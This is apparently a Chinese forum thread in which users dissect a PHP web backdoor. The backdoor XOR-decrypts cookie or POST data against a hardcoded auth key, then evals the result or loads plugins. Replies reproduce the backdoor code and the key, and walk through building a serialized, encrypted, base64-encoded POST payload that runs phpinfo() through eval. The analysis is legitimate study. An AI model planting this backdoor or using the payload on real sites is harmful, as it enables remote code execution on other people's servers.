    foreach ($_COOKIE as $key=>$value)
    {
        $data = $value;
        $data_key = $key;
    }

    if (!$data)
    {
        foreach ($_POST as $key=>$value)
        {
            $data = $value;
            $data_key = $key;
        }
    }

    $data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

    if (isset($data['ak']) && $cs_auth==$data['ak'])
    {
        if ($data['a'] == 'i')
        {
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '1.0-2',
                'ak' => $data['ak'],
            );
            echo @serialize($i);
            exit;
        }
        elseif ($data['a'] == 'e')
        {
            eval($data['d']);
        }
        elseif ($data['a'] == 'plugin')
        {
            if($data['sa'] == 'add')
            {
                cs_plugin_add($data['p'], $data['d']);
            }
            elseif($data['sa'] == 'rem')
            {
                cs_plugin_rem($data['p']);
            }
        }
        echo $data['ak'];
        exit();
    }

    cs_plugin_load();
}

dicky · 2019 年3 月 16 日 13:46

// 定义了一个全局变量cs_auth
$GLOBALS['cs_auth'] = '891765e8-4812-4efa-9a25-6c99395b135e';
//如果$data为空遍历赋值
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
//一个复杂的运算目前还没搞明白怎么计算的
$data = @unserialize(cs_decrypt(base64_decode($data), $data_key));
//判断条件如果$data['ak']不为空并且值等于全局变量 $cs_auth
if (isset($data['ak']) && $cs_auth==$data['ak'])

//如果 $data['a'] == 'e' 执行 eval ($data['d'])
elseif ($data['a'] == 'e')
{
eval($data['d']);
}

可以执行 eval fopen fwrite 应该是一个后门无疑，但是实在是没研究出来如何利用。大牛们来分析一下吧

dicky · 2019 年3 月 20 日 07:12

@ s9mf

maplgebra · 2019 年3 月 21 日 03:35

function cs_decrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    }

function cs_decrypt_phase($data, $key)
    {
        $out_data = "";

        for ($i=0; $i<strlen($data);)
        {
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
            {
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
            }
        }

        return $out_data;
    }

取了两遍异或而已:)

直接看下面判断

if (isset($data['ak']) && $cs_auth==$data['ak'])
    {
        if ($data['a'] == 'i')
        {
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '1.0-2',
                'ak' => $data['ak'],
            );
            echo @serialize($i);
            exit;
        }
        elseif ($data['a'] == 'e')
        {
            eval($data['d']);
        }

你要执行对把

$data = array("ak"=>"891765e8-4812-4efa-9a25-6c99395b135e","a"=>"e","d"=>"phpinfo();");
echo serialize($data);

输出的data，分开成$str1 ^ $cs_auth == $data //前面有$GLOBALS['cs_auth'] = '891765e8-4812-4efa-9a25-6c99395b135e';

然后再分异或$str3 ^ $str2 == $str1

post base64_encode($str3)=$str2
即可
:)

它里面有加密函数直接用不就行了：（

$cs_auth ="891765e8-4812-4efa-9a25-6c99395b135e";
$data = array("ak"=>"891765e8-4812-4efa-9a25-6c99395b135e","a"=>"e","d"=>"phpinfo();");
$str = cs_encrypt(serialize($data),'maple');
var_dump($str);
var_dump(unserialize(cs_decrypt(($str), 'maple')));

dicky · 2019 年3 月 22 日 02:27

$data = array("ak"=>"891765e8-4812-4efa-9a25-6c99395b135e","a"=>"e","d"=>"phpinfo();");

serialize($data) 序列化 a:3:{s:2:"ak";s:36:"891765e8-4812-4efa-9a25-6c99395b135e";s:1:"a";s:1:"e";s:1:"d";s:10:"phpinfo();";}

$str = cs_encrypt(serialize($data),'maple'); // 4bra(+>z{s4;z"24'{~4jtve;=qrh2srdm?(pk:f y~:xmqlf'>}1"y*rj8k4to'(llzajn'f+9bn;gfpo7zl018?h~(wg#
$str2=(unserialize(cs_decrypt(($str), 'maple')));

array(3) {
["ak"]=>
string(36) "891765e8-4812-4efa-9a25-6c99395b135e"
["a"]=>
string(1) "e"
["d"]=>
string(10) "phpinfo();"
}

$a = 'a:3:{s:2:"ak";s:36:"891765e8-4812-4efa-9a25-6c99395b135e";s:1:"a";s:1:"e";s:1:"d";s:10:"phpinfo();";}';
echo base64_encode($a);
$c='YTozOntzOjI6ImFrIjtzOjM2OiI4OTE3NjVlOC00ODEyLTRlZmEtOWEyNS02Yzk5Mzk1YjEzNWUiO3M6MToiYSI7czoxOiJlIjtzOjE6ImQiO3M6MTA6InBocGluZm8oKTsiO30';
echo base64_decode($c);

因为 $data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

POST

maple=YTozOntzOjI6ImFrIjtzOjM2OiI4OTE3NjVlOC00ODEyLTRlZmEtOWEyNS02Yzk5Mzk1YjEzNWUiO3M6MToiYSI7czoxOiJlIjtzOjE6ImQiO3M6MTA6InBocGluZm8oKTsiO30

感觉应该是这样了，好像还是没有成功执行求指教

maplgebra · 2019 年3 月 22 日 06:00

0.o
base64_encode($str = cs_encrypt(serialize($data),'maple'));

not the Data ：）

dicky · 2019 年3 月 22 日 07:32

厉害，受教了。 @_# !

clover52 · 2019 年10 月 21 日 15:11

Notice: unserialize(): Error at offset 0 of 97 bytes in E:\phpstudy_pro\WWW\demo.php on line 329
我架设调试，老是这个问题。估计哪里没弄好

clover52 · 2019 年10 月 21 日 15:15

解决了 URL ENCODE 问题

ZiFeiyu · 2019 年12 月 27 日 07:18

有搞出来没？传授一下没看太懂